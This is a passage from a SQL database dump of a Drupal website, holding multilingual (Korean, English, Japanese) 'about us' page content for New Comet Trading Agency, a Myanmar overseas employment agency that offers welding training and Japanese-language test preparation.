lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 23, 171, 'en', 0, '<p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p>', '', 'full_html'),
('page', 0, 23, 171, 'ja', 0, '<p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">当社は</span><span style=\"mso-bidi-font-size:10.5pt;\">2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年に設立し、登録</span><span style=\"mso-bidi-font-size:10.5pt;\">ID(295/2004</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ー</span><span style=\"mso-bidi-font-size:10.5pt;\">2005)</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">を持ち、サービスの提供を行ってきました。ニューコメットトレンディーグ海外エイジェンシー登録を</span><span style=\"mso-bidi-font-size:10.5pt;\">2023</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年にできまして、運営を始めました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ニューコメットトレーディング会社のグループ会社である</span><span style=\"mso-bidi-font-size:10.5pt;\">.</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">ゼィーヤーニューコメットとしては自動車輸入許可をもらって現場用トラックや、旅行用と交通機関などに使用されるバスや色々な機械を日本から直接輸入をし、販売する事業を</span><span style=\"mso-bidi-font-size:10.5pt;\">25</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">年間やり続けてきました。税金の納税もしっかり行なった上、</span><span style=\"mso-bidi-font-size:10.5pt;\">100</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人の従業員を持つ事ができました。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">それに、グループ会社であるニューコメットト建築会社、ゼィーヤシュェピーティー建築会社、アウンネーウィン建築会社でも政府からきょかおたくさん頂き、</span><span style=\"mso-bidi-font-size:10.5pt;\">200</span><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">人程の従業員を持った会社として動いております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">現在、ニューコメットトレンディグエイジェンシーでは韓国の造船所で働きたいミャンマー全国から民族問わず、商務部の下でシンマライ湾岸で経験豊富な先生達の元で練習を重ねた研修をしていただき、仕事紹介をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-bidi-font-size:10.5pt;\" lang=\"JA\">そして、ドバイ、マレーシア、シンガポール、タイ、日本にもお仕事紹介できる様に力を注いでおります。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">ミャンマーの若者達には自分に合ったお仕事や自分らしさをたもちながら、日本の技術を勉強できるようにサポートをし続けたいと努力をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">日本語能力試験</span>(JLPT,<span style=\"mso-spacerun:yes;\">&nbsp; </span>JFT, NAT-TEST, TOP-J)<span lang=\"JA\">を合格した生徒はワークビザ、研修ビザなどて、いけるように提案をしております。</span><o:p></o:p></p><p class=\"MsoNormal\"><span lang=\"JA\">我々ニューコメットトレーディング会社からは経験豊富で、能力の高い研修生達を生み出し、海外の仕事チャンスを与えることに重ねて努力をしてまいります。</span><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 171, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span 